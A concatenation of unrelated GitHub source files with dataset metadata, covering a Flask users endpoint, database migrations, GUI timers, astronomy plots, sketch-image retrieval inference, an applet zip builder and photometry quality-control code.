import json import traceback from flask import Blueprint, jsonify from bson.json_util import dumps from models.users import User get_users_blueprint = Blueprint("get_users_blueprint", __name__) @get_users_blueprint.route("/get-users") def get_users(): try: users = User.find(User.record_status=="ALIVE").all() users_list = [] for user in users: user_dict = {} for x in user: user_dict[x[0]] = x[1] users_list.append(user_dict) return jsonify({ "status_code": "200", "status": "success", "message": "users_retrieved_ok", "data": users_list }) except: traceback.print_exc() return jsonify({ "status_code": "500", "status": "error", "message": "failed_to_retrieve_users", "data": [], })
emacliam/REDIS-HACKERTHON---CRM
CRM BACKEND/controllers/users/get_users.py
get_users.py
py
947
python
en
code
0
github-code
36
12532422975
"""empty message Revision ID: 8f71e60633a3 Revises: 2e7679aa003d Create Date: 2023-01-24 23:57:44.856118 """ from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import mysql # revision identifiers, used by Alembic. revision = '8f71e60633a3' down_revision = '2e7679aa003d' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('cities', schema=None) as batch_op: batch_op.add_column(sa.Column('ascii', sa.String(length=20), nullable=True)) batch_op.add_column(sa.Column('feat_code', sa.String(length=20), nullable=True)) batch_op.drop_column('ascci') # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('cities', schema=None) as batch_op: batch_op.add_column(sa.Column('ascci', mysql.VARCHAR(length=20), nullable=True)) batch_op.drop_column('feat_code') batch_op.drop_column('ascii') # ### end Alembic commands ###
lusferror/SugestionCties
src/migrations/versions/8f71e60633a3_.py
8f71e60633a3_.py
py
1,087
python
en
code
0
github-code
36
17393417065
import sqlite3 import constants #from constants import insert_base_user DB_NAME = "vehicle_management.db" db = sqlite3.connect(DB_NAME) db.row_factory = sqlite3.Row c = db.cursor() # # insert_base_user = """ # INSERT INTO BASE_USER (user_name, email, phone_number, address) # VALUES (:user_name, :email, :phone_number, :address # ) # """ # c.execute(insert_base_user, {'user_name': 'dux', # 'email': 'dux@abv.bg', # 'phone_number': 121, # 'address': 'Ruse'}) class Mechanic: def __init__(self, user_name, email, phone_number, address, type): self.user_name = user_name self.email = email self.phone_number = phone_number self.address = address self.type = type @classmethod def save_to_db(cls, username, email, phone_number, address, type): c.execute(constants.insert_base_user, {'user_name': username, 'email': email, 'phone_number': phone_number, 'address': address, 'type': type}) ids = c.execute('SELECT ID FROM BASE_USER WHERE USER_NAME =?',(username,)) for i in ids.fetchone(): # print(i) c.execute('INSERT INTO MECHANIC VALUES (?)', (i,)) c.execute('INSERT INTO MECHANIC_SERVICE (MECHANIC_ID) VALUES (?)', (i,)) db.commit() db.commit() db.commit() @classmethod def add_service_to_mechanic_id(cls, service_name, mechanic_id): service_id = c.execute('SELECT ID FROM SERVICE WHERE NAME=?', (service_name,)) for i in service_id.fetchone(): service_id = i c.execute('UPDATE MECHANIC_SERVICE SET SERVICE_ID =? WHERE ID=?', (service_id, mechanic_id)) db.commit()
bonevb/HackBulgaria-Programming101-Python-2018
week10/01-Vehicle-Repair-Manager/mechanic.py
mechanic.py
py
1,904
python
en
code
0
github-code
36
69953437863
#!/usr/bin/env python #-*- encoding: gbk -*- import time def time_now(time_id): feedback = None T=int(time.time()) if time_id==2 or time_id==3: T+=86400 elif time_id==4 or time_id==5: T+=172800 elif time_id==6 or time_id==7: T+=259200 elif time_id==8 or time_id==9: T-=86400 elif time_id==10 or time_id==11: T-=172800 elif time_id==12 or time_id==13: T-=259200 Time=time.strftime("%H:%M", time.localtime()) Year=int(time.strftime("%Y", time.localtime(T))) Month=int(time.strftime("%m", time.localtime(T))) Day=int(time.strftime("%d", time.localtime(T))) Week=int(time.strftime("%w", time.localtime(T))) Date="%d年%d月%d日 "%(Year,Month,Day) if Week==0: Week='星期日 ' elif Week==1: Week='星期一 ' elif Week==2: Week='星期二 ' elif Week==3: Week='星期三 ' elif Week==4: Week='星期四 ' elif Week==5: Week='星期五 ' elif Week==6: Week='星期六 ' if time_id==0: feedback = '今天是'+Date elif time_id==1: feedback = '今天是'+Week elif time_id==2: feedback = '明天是'+Date elif time_id==3: feedback = '明天是'+Week elif time_id==4: feedback = '后天是'+Date elif time_id==5: feedback = '后天是'+Week elif time_id==6: feedback = '大后天是'+Date elif time_id==7: feedback = '大后天是'+Week elif time_id==8: feedback = '昨天是'+Date elif time_id==9: feedback = '昨天是'+Week elif time_id==10: feedback = '前天是'+Date elif time_id==11: feedback = '前天是'+Week elif time_id==12: feedback = '大前天是'+Date elif time_id==13: feedback = '大前天是'+Week if time_id==14: feedback = '现在时间是'+Time elif time_id==15: feedback = '今天是'+Date+Week elif time_id==16: feedback = Date+Week+Time return feedback if __name__=='__main__': info=raw_input('我能为你做些什么?') if '几号' in info: if '今天' in info: time_now(0) elif '明天' in info: time_now(2) elif '大后天' in info: time_now(6) elif '后天' in info: time_now(4) elif '昨天' in info: time_now(8) elif '大前天' in info: time_now(12) elif '前天' in info: time_now(10) elif '星期几' in info: if '今天' in info: time_now(1) elif '明天' in info: time_now(3) elif '大后天' in info: time_now(7) elif '后天' in info: time_now(5) elif '昨天' in info: time_now(9) elif '大前天' in info: time_now(13) elif '前天' in info: time_now(11) elif info == '时间'or info == '现在时间': time_now(14) elif info == '日期': time_now(15) elif '时间' in info and '日期' in info: time_now(16)
Jackeriss/Companions
the_time.py
the_time.py
py
3,041
python
en
code
16
github-code
36
7573894871
from tkinter import * import math # ---------------------------- CONSTANTS ------------------------------- # PINK = "#e2979c" RED = "#e7305b" GREEN = "#9bdeac" YELLOW = "#f7f5dd" FONT_NAME = "Courier" WORK_MIN = 25 SHORT_BREAK_MIN = 5 LONG_BREAK_MIN = 20 reps=0 timer=None # ---------------------------- TIMER RESET ------------------------------- # def reset_timer(): window.after_cancel(timer) check_marks.config(text=" ") text1.config(text='Timer') canvas.itemconfig(timer_text,text='00:00') # ---------------------------- TIMER MECHANISM ------------------------------- # def start_timer(): global reps reps+=1 if reps%2 !=0: text1.config(text='Work') count_down(WORK_MIN*60) elif reps%2==0 and reps%8 !=0: text1.config(text='Short Break') count_down(SHORT_BREAK_MIN *60) elif reps%8 ==0: text1.config(text='Long Break') count_down(LONG_BREAK_MIN * 60) # ---------------------------- COUNTDOWN MECHANISM ------------------------------- # def count_down(count): global timer count_min=math.floor(count/60) count_sec=count%60 if count_sec <10: count_sec=f"0{count_sec}" if count>=0: canvas.itemconfig(timer_text,text=f'{count_min}:{count_sec}') timer=window.after(1000, count_down, count - 1) if count ==0: start_timer() done="" cycle=math.floor(reps/2) for i in range(0,cycle): done+='✓' check_marks.config(text=done) # ---------------------------- UI SETUP ------------------------------- # window=Tk() window.title('Time Manager') #To create a gap between the image and window (it was occupying all available space) window.config(padx=100,pady=50,bg=YELLOW) canvas=Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0) #highlightthickness removes the border between th ecanvas and window img=PhotoImage(file="C:\\Users\\FACULTY OFFICIAL\\Downloads\\pomodoro-start\\tomato.png") canvas.create_image(100,112, image=img) timer_text=canvas.create_text(103, 130 , text='00:00', fill='white',font=(FONT_NAME,35,'bold')) canvas.grid(column=1,row=1) text1=Label(text='Timer',font=('ARIAL',20),fg='green') text1.grid(row=0, column=1) start_button=Button(text='Start',command=start_timer) start_button.grid(row=2,column=0) reset_button=Button(text='Reset',command=reset_timer) reset_button.grid(row=2,column=2) check_marks=Label(fg=GREEN,bg=YELLOW) check_marks.grid(column=1,row=3) count_down(5) window.mainloop()
EwezuNgim/The_Shadow_Monarch
Pomodoro_main.py
Pomodoro_main.py
py
2,527
python
en
code
0
github-code
36
29028425647
import json import os import matplotlib.pyplot as plt import numpy as np import pandas as pd import torch from torchvision import transforms from src.constants import ( DICT_CLASS, EMB_ARRAY, EMBEDDINGS, METADATA, NUM_CLOSEST_PLOT, NUMBER_RANDOM_IMAGES, PREDICTION, SKETCHY, TUBERLIN, QUICKDRAW, SKTU, SKTUQD, ) from src.data.loader_factory import load_data from src.data.utils import default_image_loader, get_loader, get_dict from src.models.utils import get_model, normalise_attention, get_parameters from src.models.metrics import get_similarity class Inference: """ Class to infer closest images of a sketch Parent class of - PlotInference called from main to plot closest images of random sketch - ApiInference called from the api to retrieve the closest images of a hand-drawn sketch """ def __init__(self, args): """ Initialises the inference with the trained model and precomputed embeddings Args: - args: arguments received from the command line (argparse) - mode: 'train', 'valid' or 'test' """ self.args = args self.transform = transforms.Compose([transforms.ToTensor()]) self.loader = default_image_loader self.im_net, self.sk_net = get_model(args, args.load) self.im_net.eval() self.sk_net.eval() torch.set_grad_enabled(False) self.prediction_folder = os.path.join(args.save, PREDICTION) os.makedirs(self.prediction_folder, exist_ok=True) self.embedding_path = os.path.join(args.save, EMBEDDINGS) os.makedirs(self.embedding_path, exist_ok=True) self.__get_data() def __get_processed_images(self): """ Get the data of images to match with the sketches Args: - mode: 'train', 'valid' or 'test' Return: - dict_class: dictionnary mapping numbers to classes names - paths to the images - classes of the images - images_embeddings: embeddings of the images """ dict_path = os.path.join(self.embedding_path, self.args.dataset + DICT_CLASS) with open(dict_path, "r") as fp: dict_class = json.load(fp) array_path = os.path.join( self.embedding_path, self.args.dataset + "_images" + EMB_ARRAY ) with open(array_path, "rb") as f: images_embeddings = np.load(f) meta_path = os.path.join( self.embedding_path, self.args.dataset + "_images" + METADATA ) df = pd.read_csv(meta_path, sep=" ") return dict_class, df["fnames"].values, df["classes"].values, images_embeddings def __get_data(self): """ Loads the paths, classes and embeddings of the images of different datasets """ dataset = self.args.dataset if dataset in [SKETCHY, TUBERLIN, QUICKDRAW]: ( self.dict_class, self.images_fnames, self.images_classes, self.images_embeddings, ) = self.__get_processed_images() self.sketchy_limit = None self.tuberlin_limit = None elif dataset in [SKTU, SKTUQD]: self.args.dataset = SKETCHY ( dict_class_sk, self.images_fnames, self.images_classes, self.images_embeddings, ) = self.__get_processed_images() self.sketchy_limit = len(self.images_fnames) self.tuberlin_limit = None self.args.dataset = TUBERLIN ( dict_class_tu, images_fnames, images_classes, images_embeddings, ) = self.__get_processed_images() self.dict_class = [dict_class_sk, dict_class_tu] self.images_fnames = np.concatenate( (self.images_fnames, images_fnames), axis=0 ) self.images_classes = np.concatenate( (self.images_classes, images_classes), axis=0 ) self.images_embeddings = np.concatenate( (self.images_embeddings, images_embeddings), axis=0 ) if dataset == SKTUQD: self.args.dataset = QUICKDRAW self.tuberlin_limit = len(self.images_fnames) ( dict_class_qd, images_fnames, images_classes, images_embeddings, ) = self.__get_processed_images() self.dict_class.append(dict_class_qd) self.images_fnames = np.concatenate( (self.images_fnames, images_fnames), axis=0 ) self.images_classes = np.concatenate( (self.images_classes, images_classes), axis=0 ) self.images_embeddings = np.concatenate( (self.images_embeddings, images_embeddings), axis=0 ) else: raise Exception(self.args.dataset + " not implemented.") self.args.dataset = dataset def inference_sketch(self, sk): """ Find the closest images of a sketch and plot them """ self.sketch = self.transform(sk).unsqueeze(0) if self.args.cuda: self.sketch = self.sketch.cuda() sketch_embedding, self.attn_sk = self.sk_net(self.sketch) if self.args.cuda: sketch_embedding = sketch_embedding.cpu() similarity = get_similarity( sketch_embedding.detach().numpy(), self.images_embeddings ) arg_sorted_sim = (-similarity).argsort() self.sorted_fnames = [ self.images_fnames[i] for i in arg_sorted_sim[0][0 : NUM_CLOSEST_PLOT + 1] # noqa E203 ] self.sorted_labels = [ self.images_classes[i] for i in arg_sorted_sim[0][0 : NUM_CLOSEST_PLOT + 1] # noqa E203 ] return sketch_embedding def get_heatmap(self): """ Normalise the attention output of the model for heatmap plots """ attn_sk = normalise_attention(self.attn_sk, self.sketch) self.heat_map = attn_sk.squeeze().cpu().detach().numpy() def prepare_image(self, index): """ Gets an an image and its label based on its index """ dataset = self.sorted_fnames[index].split("/")[-4] loader = get_loader(dataset) image = loader(self.sorted_fnames[index]) dict_class = get_dict(dataset, self.dict_class) label = dict_class[str(self.sorted_labels[index])] return image, label class PlotInference(Inference): """ Plot inference of a random sketch with its closest images in the latent space""" def __init__(self, args, dataset_type): super().__init__(args, dataset_type) def random_images_inference(self, number_sketches): """ Selects number_sketches random sketched and find the closest images """ _, _, [test_sk_loader, _], _ = load_data(self.args, self.transform) rand_samples_sk = np.random.randint( 0, high=len(test_sk_loader), size=number_sketches ) for i in range(len(rand_samples_sk)): _, sketch_fname, _ = test_sk_loader[rand_samples_sk[i]] self.sk = self.loader(sketch_fname) self.inference_sketch(self.sk) self.get_heatmap() self.plot_closest(sketch_fname) def plot_closest(self, sketch_fname): """ Plots a sketch with its closest images in the embedding space. The images are stored in the same folder as the best model in a subfolder called 'predictions' """ fig, axes = plt.subplots( 1, NUM_CLOSEST_PLOT + 2, figsize=((NUM_CLOSEST_PLOT + 1) * 4, 8) ) axes[0].imshow(self.sk) axes[0].set(title="Sketch \n Label: " + sketch_fname.split("/")[-2]) axes[0].axis("off") axes[1].imshow(self.sk) axes[1].imshow(255 * self.heat_map, alpha=0.7, cmap="Spectral_r") axes[1].set(title=sketch_fname.split("/")[-2] + "\n Attention Map") axes[1].axis("off") for i in range(2, NUM_CLOSEST_PLOT + 2): im, label = self.prepare_image(i - 1) axes[i].imshow(im) axes[i].set(title="Closest image " + str(i) + "\n Label: " + label) axes[i].axis("off") plt.subplots_adjust(wspace=0.25, hspace=-0.35) img_name = "_".join(sketch_fname.split("/")[-2:]) plt.savefig(os.path.join(self.prediction_folder, img_name)) plt.close(fig) def main(args): """ From here, the inference is done on a random sketch and a plot with its closest images is made """ inference = PlotInference(args, "test") inference.random_images_inference(number_sketches=NUMBER_RANDOM_IMAGES) if __name__ == "__main__": args = get_parameters() args.cuda = args.ngpu > 0 and torch.cuda.is_available() main(args)
VisiumCH/AMLD-2021-Sketchy
src/models/inference/inference.py
inference.py
py
9,160
python
en
code
0
github-code
36
31987030282
# !/usr/bin/env python # -*- coding: utf-8 -*- import contextlib import os import zipfile import os.path import yaml import json applets_index = [] @contextlib.contextmanager def change_dir(path): old_path = os.getcwd() os.chdir(path) yield os.chdir(old_path) def read_applet_config(applet_path) -> dict: config_path = os.path.join(applet_path, 'manifest.yml') if not os.path.exists(config_path): raise Exception(f'{applet_path} not exist manifest.yml') with open(config_path, 'r', encoding='utf8') as f: return yaml.safe_load(f) def zip_applet(applet_path, dst_dir): dir_path = os.path.dirname(applet_path) if not os.path.exists(dst_dir): os.makedirs(dst_dir) print(f'creat zip build folder: {dst_dir}') with change_dir(dir_path): app_config = read_applet_config(applet_path) if app_config.get("name"): applets_index.append(app_config) applet_name = os.path.basename(applet_path) zip_name = os.path.join(dst_dir, applet_name + '.zip') filelist = [] if os.path.isfile(applet_path): filelist.append(applet_path) else: for root, dirs, files in os.walk(applet_name): for name in files: filelist.append(os.path.join(root, name)) with zipfile.ZipFile(zip_name, "w", zipfile.ZIP_DEFLATED) as zf: for tar in filelist: zf.write(tar, tar) print(f'zip {applet_name} applet to {zip_name} success') ignore_dirs = ['dist', 'node_modules', 'build', 'venv', '.git', '.idea', '.vscode', '__pycache__', 'demo', 'pip_packages', ] def zip_all_applets(project_path): applets_dir = [] for file in os.listdir(project_path): applet_path = os.path.join(project_path, file) if not os.path.isdir(applet_path): continue if file.startswith(".") or file in ignore_dirs: continue applets_dir.append(applet_path) dist_dir = os.path.join(project_path, 'build') for applet in applets_dir: zip_applet(applet, dist_dir) def write_index_json(project_path): dst_dir = os.path.join(project_path, 'build') with change_dir(dst_dir): with open('index.json', 'w', encoding='utf8') as f: json.dump(applets_index, f, ensure_ascii=False, indent=4) def run(): root_path = os.path.dirname(os.path.abspath(__file__)) zip_all_applets(root_path) write_index_json(root_path) if __name__ == '__main__': run()
jumpserver/applets
build.py
build.py
py
2,560
python
en
code
9
github-code
36
29261172588
import xml.etree.ElementTree as ET def xml_parse(file_byte): def get_recursive(parent): res = {} if not parent.getchildren(): res[parent.tag] = '' return res res[parent.tag] = [] for child in parent: if child.getchildren(): res[parent.tag].append(get_recursive(child)) else: res[parent.tag].append({child.tag: child.text}) return res root = ET.fromstring(file_byte) return get_recursive(root)
oktavianustjoea/ap-app
xml_converter/utils.py
utils.py
py
529
python
en
code
0
github-code
36
35291375172
""" Created on Tue Apr 26 20:17:37 2022 @author: celiaberon """ import os import numpy as np import pandas as pd import scipy from nta.features.select_trials import match_trial_ids from nta.preprocessing.signal_processing import snr_photo_signal def QC_included_trials(ts: pd.DataFrame, trials: pd.DataFrame, allow_discontinuity: bool = False, **kwargs) -> dict: ''' Quality control within sessions to match timeseries and trial dataframes starting and ending trial ID values. Also remove -- remove high timeout blocks. Args: ts: Timeseries containing states and neural data for a single session. trials: Trial data for single session. allow_discontinuity: Whether or not continuous trial structure can be broken. If False, only trials from beginning/end can be excluded. If False, also permits mismatch in trial ids between min and max trial. Returns: trials_matched (dict): {'trials': trial data, 'ts': timeseries data} Contain only identical trial sets. ''' assert ts.session.dropna().nunique() == 1, ( 'multi-session not implemented') assert trials.Session.dropna().nunique() == 1, ( 'multi-session not implemented') trials_ = trials.copy() ts_ = ts.copy() # flag only blocks that don't disrupt photometry timeseries min_trial = trials_.query('~flag_block').nTrial.min() max_trial = trials_.query('~flag_block').nTrial.max() flagged_blocks = (trials_ .query('~nTrial.between(@min_trial, @max_trial)') .nTrial.dropna().values) trials_ = trials_.loc[~trials_.nTrial.isin(flagged_blocks)] # Match min and max trial IDs only (can differ internally but offset will) # be consistent. trials_, ts_ = match_trial_ids(trials_, ts_, allow_discontinuity=allow_discontinuity) return {'trials': trials_, 'ts': ts_} def QC_enl_penalty_rate(trials: pd.DataFrame) -> list: ''' Generate list of sessions satisfying ENL penalty criteria, defined as no greater than 2 std above mean penalty rate in final sessions. Args: trials (pandas.DataFrame): Trial data. Returns: qc_sessions (list): Sessions that pass ENLP quality control criteria. ''' trials_ = trials.copy() trials_['penalty'] = trials_['n_ENL'] > 1 trials_['Date'] = pd.to_datetime(trials_['Date'], format='%Y_%m_%d') penalties = (trials_ .sort_values(by='Date') .groupby(['Mouse', 'Date', 'Session'], as_index=False) .penalty.mean()) for mouse, mouse_penalties in penalties.groupby('Mouse'): late_dates = np.sort(mouse_penalties.Date.unique())[-6:] late_sessions = mouse_penalties.query('Date.isin(@late_dates)') late_sessions_mean = np.nanmean(late_sessions['penalty']) late_sessions_std = np.nanstd(late_sessions['penalty']) qc_criteria = late_sessions_mean + (2 * late_sessions_std) penalties.loc[penalties.Mouse == mouse, 'QC_criteria'] = qc_criteria penalties['Pass'] = penalties['penalty'] <= penalties['QC_criteria'] qc_sessions = penalties.query('Pass == True').Session.values return qc_sessions def get_sess_val(trials, trial_variable): val = (trials .groupby('Session') .apply(lambda x: x[trial_variable].unique()) .squeeze().item()) return val def QC_session_performance(trials: pd.DataFrame, ts: pd.DataFrame, update_log: bool = False, **kwargs) -> bool: ''' Filter out sessions that don't meet certain criteria: target_avg_threshold: Proportion of trials to high value port, must exceed side_bias_threshold: Proportion of trials that can favor one side (above/below 0.5) spout_bias_threshold: Proportion of licks to one spout (slightly more inclusive than choice) Args: trials (pandas.DataFrame): Trial data. ts (pandas.DataFrame): Timeseries data. update_log (bool): TRUE if saving .csv overview of session qc stats. filename_suffix (str): Suffix for session log filename. Returns: criteria_met (bool): TRUE if passes quality control. ''' criteria_met = True # Set thresholds for session-level behavioral performance. condition_perf_thresh = {9010: 0.7, '9010': 0.7, 8020: 0.6, '8020': 0.6} TARGET_AVG = condition_perf_thresh.get(trials.Condition.unique()[0]) SIDE_BIAS = 0.1 SPOUT_BIAS = 0.15 MIN_TRIALS = 100 # Evaluate spout bias on same trials as trial-level QC (i.e., not # including flagged blocks). trial_ids = trials.nTrial.unique() ts_ = ts.copy().query('nTrial.isin(@trial_ids)') n_valid_trials = (trials .query('flag_block==False & timeout==False')['nTrial'] .nunique()) target_avg = trials.selHigh.mean() if target_avg < TARGET_AVG: criteria_met = False right_avg = trials.direction.mean() if np.abs(right_avg - 0.5) > SIDE_BIAS: criteria_met = False spout_avg = (ts_.query('iSpout.ne(0)') .iSpout.value_counts(normalize=True)[2.]) if np.abs(spout_avg - 0.5) > SPOUT_BIAS: criteria_met = False if n_valid_trials < MIN_TRIALS: criteria_met = False if update_log: enlp_rate = np.mean(trials['n_ENL'] > 1) qc_summary = pd.DataFrame({'Mouse': get_sess_val(trials, 'Mouse'), 'Date': get_sess_val(trials, 'Date'), 'Session': get_sess_val(trials, 'Session'), 'P(right)': round(right_avg, 2), 'P(high)': round(target_avg, 2), 'P(spout)': round(spout_avg, 2), 'N_valid_trials': n_valid_trials, 'enl_penalty_rate': round(enlp_rate, 2), 'Pass': criteria_met}, index=[0]) save_session_log(qc_summary, **kwargs) return criteria_met def load_session_log(path_to_file: str): ''' Load existing session log if it exists, otherwise initialize a new one. Args: path_to_file: Path including filename to try loading in file. Returns: session_log: DataFrame containing session summary quality control stats. logged_sessions: List of sessions already included in session_log. ''' try: session_log = pd.read_csv(path_to_file, index_col=None) logged_sessions = ['_'.join(sess) for sess in session_log[['Mouse', 'Date']].values] return session_log, logged_sessions except FileNotFoundError: return pd.DataFrame(), [] def save_session_log(sess_qc: pd.DataFrame, fname_suffix: str = 'photometry', root: str = '', **kwargs): ''' Save summary of session quality control metrics. Args: sess_qc: DataFrame containing quality control metrics for single session. filename_suffix: Suffix for session_log filename. Returns: None ''' if not root: root = input('Please provide a path for logging:') filename = f'session_log_{fname_suffix}.csv' path_to_file = os.path.join(root, filename) session_log, logged_sessions = load_session_log(path_to_file) curr_session = f'{sess_qc.Mouse.item()}_{sess_qc.Date.item()}' if curr_session not in logged_sessions: tmp_log = pd.DataFrame({'Mouse': sess_qc['Mouse'].item(), 'Date': sess_qc['Date'].item()}, index=[0]) session_log = pd.concat((session_log, tmp_log)).reset_index(drop=True) if 'N_valid_trials' not in session_log.columns: updated_log = pd.merge(session_log, sess_qc, on=['Mouse', 'Date'], how='left') else: updated_log = session_log.copy() for col in sess_qc.columns.drop(['Mouse', 'Date']): mouse, date, val = sess_qc[['Mouse', 'Date', col]].iloc[0].values idx = updated_log.query('Mouse == @mouse & Date == @date').index updated_log.loc[idx, col] = val updated_log.to_csv(path_to_file, index=False) def QC_photometry_signal(timeseries: pd.DataFrame, mouse: str, session_date: str, ) -> pd.DataFrame: ''' Quality control on signal strength in photometry channels using FFT method. If bilateral signals pass, take delta between right and left. Args: timeseries (pandas.DataFrame): Timeseries data containing photometry signal. mouse (str): Mouse ID. session_date (str): Session ID. pp_style (bool): Deprecated, if changing standardization method for photometry. Returns: timeseries (pandas.DataFrame): Copy of input but replace data with NaNs where QC fails. ALTERNATE: early return with FALSE if no channels pass QC. ''' ts_ = timeseries.copy() # always use z-scored data just for QC consistency y_cols = ts_.columns.intersection(['z_grnR', 'z_grnL']) # need different thresholds for dLight vs GRAB-DA qc_thresh = 2 if mouse in ['C32', 'C33', 'C34', 'C35'] else 5 y_cols = [col for col in y_cols if snr_photo_signal(ts_, col) < qc_thresh] if len(y_cols) == 2: print(f'insufficient photometry data...discarding {session_date}') return None for y_col in y_cols: ts_[y_col] = np.nan # NaNs for cols that don't pass QC if len(y_cols) == 2: ts_['z_grnDelta'] = ts_['z_grnR'] - ts_['z_grnL'] y_cols_pass = {'z_grnR', 'z_grnL'} - set(y_cols) return ts_, y_cols_pass def is_normal(ts, include_score=False, verbose=False, thresh_score=0, sensor='grabda_vls'): ''' Test for normality as a measure of signal to noise. Result of normally distributed data fails to pass QC protocol. Normality is determined via collective evaluation of skew, kurtosis, and K-S test p-value. Args: ts: Timeseries to be evaluated. include_score: Whether or not to include the number of metrics that passed as normally distributed. thresh_score: Threshold for permissable tests that return normality=True. Default of 1 means any test returning normal dist is sufficient to accept dist as normal (most conservative inclusion level). Returns: result: True if any metric is consistent with normal distribution. False if all metrics deviate from normal distribution. score: Number of metrics that are consistent with normal distribution (0 to 3). ''' if ts is None: # needs to be a distribution to have signal return True thresholds = {'grabda_vls': (0.5, 0.8), 'grabda_dms': (0.1, 0.2)} skew_thresh, kurt_thresh = thresholds.get(sensor) skew = np.abs(ts.skew()) < skew_thresh kurtosis = np.abs(ts.kurtosis()) < kurt_thresh rand_normal = np.random.normal(0, np.nanstd(ts), len(ts)) _, p_value = scipy.stats.ks_2samp(ts, rand_normal, alternative="two-sided") ks_test = p_value > 0.05 score = sum((skew, kurtosis, ks_test)) # print(skew, kurtosis, ks_test) result = score > thresh_score if include_score: if verbose: print(f'skew = {np.abs(ts.skew())}\n', f'kurtosis = {np.abs(ts.kurtosis())}\n', f'p_value = {p_value}') return result, score else: if verbose: print(f'skew = {np.abs(ts.skew())}\n', f'kurtosis = {np.abs(ts.kurtosis())}\n', f'p_value = {p_value}') return result
celiaberon/neural-timeseries-analysis
nta/preprocessing/quality_control.py
quality_control.py
py
12,580
python
en
code
0
github-code
36
26626844923
import astropy.units as u from astropy.coordinates.sky_coordinate import SkyCoord from astropy.units import Quantity from astropy.io.votable import parse from astropy.table import Table from matplotlib.colors import LogNorm import matplotlib.pyplot as plt import numpy as np extra_data = np.genfromtxt("Data/Mean_extinction_excess_SourceID_500pc_AG-4.4_BminR-1.7.dat", names = True, dtype=None) source_id = extra_data['source_id'] readresults = Table.read('Data/All-star-500pc-AG-4.4-BminR-1.7.fits',format='fits') results = np.array(readresults) #Find the nonmatching source_id nonmatches = np.array([]) j=0 for i in range(len(source_id)): not_found = True while not_found: if source_id[i]!=results['source_id'][j]: nonmatches = np.append(nonmatches,j) j+=1 else: not_found = False j+=1 print(j) #Delete the rows with source_id that have no AG and EBminR for k in range(len(nonmatches)): results = np.delete(results,nonmatches[k]-k) #Check if the deletion was succesful j=0 nonmatches_check = np.array([]) for i in range(len(source_id)): not_found = True while not_found: if source_id[i]!=results['source_id'][j]: nonmatches_check = np.append(nonmatches_check,j) j+=1 else: not_found = False j+=1 print(j) x=results['bp_rp']-extra_data['EBminR'] y_gaia=results['phot_g_mean_mag']+5*np.log10(results['parallax'])-10-extra_data['AG'] k=np.linspace(-4, 1, 1000) counts_gaia,xbins_gaia,ybins_gaia,image_gaia = plt.hist2d(x,y_gaia,bins=600,normed=True,norm=LogNorm(),cmap = plt.cm.jet) plt.colorbar() plt.vlines(x=0, ymin=-5, ymax=2,color=(1.0,0.2,0.3)) plt.vlines(x=0.33, ymin=-5, ymax=4,color=(1.0,0.2,0.3)) #plt.contour(counts_gaia.transpose(), extent=[xbins_gaia.min(),xbins_gaia.max(),ybins_gaia.min(),ybins_gaia.max()], colors='k', linewidth=0.01, levels = [0.1]) plt.text(-0.6, -3.5, 'OB') plt.text(0.1, -3.5, 'A') plt.plot(k,3*k+2.1,linestyle='-',color=(1.0,0.2,0.3)) plt.xlim(np.min(x),1.7) plt.ylim(-4,4.4) plt.xlabel(r'$(G_{BP}-G_{RP})-<E(B-R)>$') plt.ylabel(r'$M_G-<A_G>$') plt.gca().invert_yaxis() plt.savefig('CM-Diagram_All-star-500pc-AG-4.4-BminR-1.7-Corrected_mean_AG_EBminR.png')
spacer730/Gaia_research
Queries-CM-Diagrams/CM-Diagram-corrected_mean_AG-EBminR .py
CM-Diagram-corrected_mean_AG-EBminR .py
py
2,142
python
en
code
0
github-code
36
31850440252
import matplotlib.pyplot as plt import numpy as np # x axis u = np.arange(0.0,2.74,0.01,dtype=np.cdouble) v = np.arange(2.74,5.0,0.01,dtype=np.cdouble) x = np.arange(0.0,5.0,0.01,dtype=np.cdouble) y = np.arange(0.0,3.83,0.01, dtype=np.cdouble) z = np.arange(3.83,5.0,0.01, dtype=np.cdouble) # y axis def f(t, option = 0): c = 1 b = np.sqrt(t ** 4 - 16 * t ** 2 + 20) a = -t ** 2 +8 if option % 2 == 1: b *= -1 if option > 1: c = -1 return c * np.sqrt(a+b)/np.sqrt(complex(22)) def g(t, option = 0): c = 1 b = np.sqrt(t ** 4 - 8 * t ** 2 + 4) a = 4 - t ** 2 if option % 2 == 1: b *= -1 if option > 1: c = -1 return c * np.sqrt(a+b)/np.sqrt(complex(6)) # use LaTeX fonts in the plot plt.rc('text', usetex=True) plt.rc('font', family='serif') n = plt.figure() # plot plt.subplot(2,1,1) for i in range(4): plt.plot(x, np.real(f(x,i)), color="black") plt.plot(x, np.real(g(x,i)), color="black") plt.axvline(x=0.733, color = "black", alpha = 0.5, dashes = (2,2)) plt.axvline(x=3.83, color = "black", alpha = 0.5, dashes = (2,2)) # set labels (LaTeX can be used) plt.title(r'\textbf{Symmetry Breaking}', fontsize=11) plt.ylabel(r'\textbf{Re[$\omega$]}', fontsize=11) plt.subplot(2,1,2) for i in range(4): plt.plot(y, np.imag(f(y,i)), color="black") plt.plot(z, np.imag(f(z,i)), color="black") plt.plot(u, np.imag(g(u,i)), color="black") plt.plot(v, np.imag(g(v,i)), color="black") # set labels (LaTeX can be used) plt.axvline(x=0.733, color = "black", alpha = 0.5, dashes = (2,2)) plt.axvline(x=3.83, color = "black", alpha = 0.5, dashes = (2,2)) plt.xlabel(r'\textbf{$\gamma$}', fontsize=11) plt.ylabel(r'\textbf{Im[$\omega$]}', fontsize=11) plt.show() # save as PDF n.savefig("pt_breaking.pdf",)
cesaregarza/QMResearch
plotter.py
plotter.py
py
1,812
python
en
code
0
github-code
36
27663638173
from typing import List class Solution: def isPalindrome(self, s: str) -> bool: s1 = ''.join(ch for ch in s if ch.isalnum()).lower() s2 = s1[::-1] return s1 == s2 def isPalindrome(self, s: str) -> bool: s1 = ''.join(ch for ch in s if ch.isalnum()).lower() s2 = s1[::-1] return s1 == s2 def isPalindrome_correct(self, s: str) -> bool: return 0 if __name__=="__main__": Solution = Solution() s = "A man, a plan, a canal: Panama" is_palimdrome = Solution.isPalindrome(s) print(is_palimdrome)
robertCho/LeetCode
Multiple Points/E125 Valid Palindrome.py
E125 Valid Palindrome.py
py
583
python
en
code
0
github-code
36
72215373865
